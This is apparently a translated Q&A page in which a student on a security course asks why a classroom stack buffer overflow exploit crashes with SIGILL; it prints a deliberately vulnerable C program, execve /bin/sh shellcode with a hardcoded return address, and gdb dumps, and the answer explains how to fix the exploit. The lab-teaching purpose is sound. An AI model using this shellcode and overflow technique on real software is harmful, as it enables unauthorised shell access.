尝试执行缓冲区溢出攻击时获取SIGILL

时间:2011-09-30 22:47:37

标签: c buffer-overflow

我正在为我的安全类开发缓冲区溢出项目,我想我已经完成了所有设置,但是当我运行它时,我得到了:

Program received signal SIGILL, Illegal Instruction.
0x08048500 in main(argc=4854718, argv=0x0804b008) at stack.c:22
22       fread(str,sizeof(char),517,badfile);

Heres stack.c 

int bof(char *str) 
{
    char buffer[12]; 
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str); 
    return 1; 
} 

int main(int argc, char **argv) 
{ 
    char str[517]; 
    FILE *badfile; 
    badfile = fopen("badfile", "r"); 
    fread(str, sizeof(char), 517, badfile); 
    bof(str); 
    printf("Returned Properly\n"); 
    return 1; 
}

这是exploit.c 

char code[]=

"\x31\xc0"                      // xorl         %eax,%eax

"\x50"                          // pushl        %eax

"\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e

"\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f

"\x89\xe3"                      // movl         %esp,%ebx

"\x99"                          // cltd

"\x52"                          // pushl        %edx

"\x53"                          // pushl        %ebx

"\x89\xe1"                      // movl         %esp,%ecx

"\xb0\x0b"                      // movb         $0xb,%al

"\xcd\x80"                      // int          $0x80

;

char retaddr[] = "\x70\xF2\xFF\xBF";

void main(int argc, char **argv)
{
    char strr[517];
    strr[0] = 'Z';
    strr[1] = 0;
    strr[2] = '\x00';
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    //memcpy(buffer, "EGG=", 4);

    memcpy(buffer, code, 24);

    memcpy(buffer+20,retaddr,4);

    memcpy(buffer+24,"\x00\x00\x00\x00",4);


    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer,517,1,badfile);
    fclose(badfile);    
}

这是运行时的堆栈。 启动程序:/ home / john / stack 

Breakpoint 1, bof (
str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277")
at stack.c:13
13      strcpy(buffer, str);
(gdb) x/12xw $esp
0xbffff270: 0x00000205  0xbffff298  0x004a13be  0x0804b008
0xbffff280: 0xbffff2b7  0x00000205  0xb7fef6c0  0x00584ff4
0xbffff290: 0x00000000  0x00000000  0xbffff4c8  0x0804850f
(gdb) s
14      return 1;
(gdb) x/12xw $esp
0xbffff270: 0xbffff284  0xbffff2b7  0x004a13be  0x0804b008
0xbffff280: 0xbffff2b7  0x6850c031  0x68732f6e  0x622f2f68
0xbffff290: 0x99e38969  0xe1895352  0xbffff270  0x08048500
(gdb) c
Continuing.

我知道为什么会收到SIGILL?

1 个答案:

答案 0 :(得分:4)

因为您正在执行非法代码。在exploit.c中,您使用返回地址覆盖偏移量20-23 - 这些字节之前是b0 0b cd 80对应于最后两个mov $0xb,%alint $0x80指令的字节。你输入的零字节是非法代码。

由于返回地址必须针对此目标的特定偏移量,因此您需要修改shell代码以不使用该数据。我建议将shell代码移动到该偏移量之后并将返回地址指向那里,或者在返回地址上跳转,以便处理器不会尝试执行它。

相关问题
最新问题